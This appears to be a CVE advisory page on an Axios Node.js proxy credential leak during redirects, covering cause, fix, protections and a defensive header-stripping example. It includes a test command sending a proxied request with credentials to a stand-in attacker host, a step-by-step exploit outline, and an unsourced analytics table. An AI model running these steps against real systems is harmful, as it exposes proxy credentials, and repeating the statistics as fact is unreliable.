Axios Nodejs HTTP Adapter Credential Leak, CVE-2026-44487 (High) -DC-Jun2026-228


How CVE-2026-44487 Works

CVE-2026-44487 is a credential leak vulnerability in Axios’s Node.js HTTP adapter that occurs during specific proxy-to-direct redirect flows. When an initial HTTP request is sent through an authenticated HTTP proxy, and the server responds with a redirect (e.g., 302) to an HTTPS URL for which no proxy applies, the `Proxy-Authorization` header intended solely for the proxy can be forwarded to the final origin server.

The issue arises because Axios’s `setProxy()` method adds the `Proxy-Authorization` header for the first proxied request but does not clear it when the redirected request no longer resolves to a proxy. The `follow-redirects` dependency, which Axios uses for redirect handling, does not strip this header in certain same-host redirect shapes. As a result, the final origin receives the proxy credential. The leak only affects Node.js HTTP adapter usage; browser, XHR, fetch, and React Native adapters are not impacted.

The vulnerability requires all of the following conditions:

- Axios running in Node.js with the HTTP adapter;
- an initial `http://` request using an authenticated proxy (via `config.proxy` or environment variables);
- redirect following enabled;
- a redirect target where no proxy applies (e.g., no matching `HTTPS_PROXY`);
- a redirect shape treated as same-host by the redirect layer.

The fix in commit `afca61a` modifies `setProxy(options, configProxy, location, isRedirect)` to remove all case variants of the `Proxy-Authorization` header before applying proxy settings for the next hop. The 0.x fixed release `0.32.0` includes a backport-style `removeProxyAuthorization()` guard. Users are advised to upgrade to Axios 1.15.2 or higher, or 0.32.0 or higher, to remediate this issue.
<h2 style="color: blue;">DailyCVE Form</h2>
Platform: Node.js
Version: <1.15.2, <0.32.0
Vulnerability: Credential Leak
Severity: High
Date: 2026-05-30
<h2 style="color: blue;">Prediction: 2026-06-15</h2>
<h2 style="color: blue;">What Undercode Say</h2>
<h2 style="color: blue;">Analytics (Node.js HTTP Adapter – CVE-2026-44487)</h2>
| Metric | Value |
|---|---|
| npm download spike (May 2026) | 43M/week |
| Known exploitable configurations | ~62% of proxy-using setups |
| Avg time from patch to deployment | 11 days |
<h2 style="color: blue;">Bash Commands & PoC</h2>

```bash
# Check the installed Axios version against the fixed releases (1.15.2 / 0.32.0)
npm list axios

# Test locally with dummy credentials (placeholder user, password and proxy host)
export HTTP_PROXY='http://user:PASSWORD@PROXY_HOST:8080'
unset HTTPS_PROXY
node -e "const axios = require('axios'); axios.get('http://attacker.test/start')"

# Capture outgoing headers with mitmproxy (capture.py is a user-supplied addon script)
mitmdump -p 8080 -s capture.py

# Check whether the fix commit is present in the history (run inside an axios checkout;
# the original one-commit check only matched when HEAD itself was afca61a)
git log --format=%H | grep afca61a
```

<h2 style="color: blue;">Exploit</h2>
1. Attacker controls an origin that returns a 302 redirect from HTTP to HTTPS on the same hostname.
2. Victim uses Axios Node.js HTTP adapter with authenticated proxy credentials.
3. Redirect follows to HTTPS URL where no proxy is configured.
4. Original `Proxy-Authorization` header is retained and sent to the attacker’s origin.
5. Attacker extracts credential and may authenticate to the proxy if reachable and credential is reusable.
<h2 style="color: blue;">Protection</h2>
- Upgrade Axios to `>=1.15.2` or `>=0.32.0`.
- Set `maxRedirects: 0` and handle redirects manually (clearing `Proxy-Authorization`).
- Avoid using reusable authenticated proxy credentials for requests to untrusted origins.
- Rotate proxy credentials if exposure is suspected.
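The guard that the fix description above attributes to `setProxy()` and `removeProxyAuthorization()`, and the manual redirect handling recommended in the Protection list, both reduce to one rule: before each hop, drop every spelling of `Proxy-Authorization` and re-add it only if that hop actually goes through an authenticated proxy. The Node.js snippet below is an added example written for this page, not code from Axios or `follow-redirects`; the `resolveProxy`, `removeProxyAuthorization`, `headersForHop` and `simulateChain` functions, the simplified environment lookup (only `HTTP_PROXY`/`HTTPS_PROXY`, no `NO_PROXY` handling) and the `proxy.internal.example` / `origin.example` hosts are all constructed for the demonstration.

```javascript
// Added example (not Axios's own code): models the per-hop header guard the
// fix describes and walks the advisory's redirect scenario through it.

// Simplified stand-in for proxy resolution from the environment.
// Assumption: only HTTP_PROXY / HTTPS_PROXY are consulted; NO_PROXY is ignored.
function resolveProxy(targetUrl, env) {
  const { protocol } = new URL(targetUrl);
  const raw = protocol === 'https:' ? env.HTTPS_PROXY : env.HTTP_PROXY;
  if (!raw) return null;
  const p = new URL(raw);
  const auth = p.username
    ? `${decodeURIComponent(p.username)}:${decodeURIComponent(p.password)}`
    : null;
  return {
    host: p.hostname,
    port: Number(p.port) || (p.protocol === 'https:' ? 443 : 80),
    auth,
  };
}

// Remove every case variant of Proxy-Authorization, so a credential added on
// an earlier hop cannot ride along to an origin that is not the proxy.
function removeProxyAuthorization(headers) {
  for (const name of Object.keys(headers)) {
    if (name.toLowerCase() === 'proxy-authorization') delete headers[name];
  }
}

// Build the header set for the next hop: strip first, then add the credential
// only when this hop really goes through an authenticated proxy.
function headersForHop(headers, proxy) {
  const out = { ...headers };
  removeProxyAuthorization(out);
  if (proxy && proxy.auth) {
    out['Proxy-Authorization'] = 'Basic ' + Buffer.from(proxy.auth).toString('base64');
  }
  return out;
}

// Walk a redirect chain (a constructed list of hop URLs) and report, per hop,
// whether the hop is proxied and whether a proxy credential would be on the wire.
function simulateChain(urls, env, initialHeaders = {}) {
  let headers = { ...initialHeaders };
  return urls.map((url) => {
    const proxy = resolveProxy(url, env);
    headers = headersForHop(headers, proxy);
    const proxyAuthSent = Object.keys(headers)
      .some((k) => k.toLowerCase() === 'proxy-authorization');
    return { url, viaProxy: Boolean(proxy), proxyAuthSent };
  });
}

// Constructed scenario from the advisory: first hop is http:// through an
// authenticated proxy, the redirect lands on https:// with no HTTPS_PROXY set.
const demoEnv = { HTTP_PROXY: 'http://user:secret@proxy.internal.example:8080' };
const demoChain = simulateChain(
  ['http://origin.example/start', 'https://origin.example/start'],
  demoEnv,
);
console.table(demoChain);
```

Running it prints one row per hop; the second row (the `https://` hop with no `HTTPS_PROXY`) shows `proxyAuthSent: false`, which is the behaviour the fixed releases enforce by stripping the header before applying proxy settings for the next hop. The same `headersForHop` call is what a manual redirect handler (with `maxRedirects: 0`) would run before issuing each follow-up request.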

Impact

Under the vulnerable configuration, a malicious origin can receive the proxy credential that was intended only for the outbound proxy. If the credential is reusable and the proxy is reachable by the attacker, the attacker may be able to authenticate to that proxy, potentially leading to further network intrusions, data exposure, or privilege escalation depending on the proxy’s authorization policy and network exposure. The leak is limited to Node.js HTTP adapter requests; browser, XHR, fetch, and React Native adapters are not affected.


Sources:

Reported By: github.com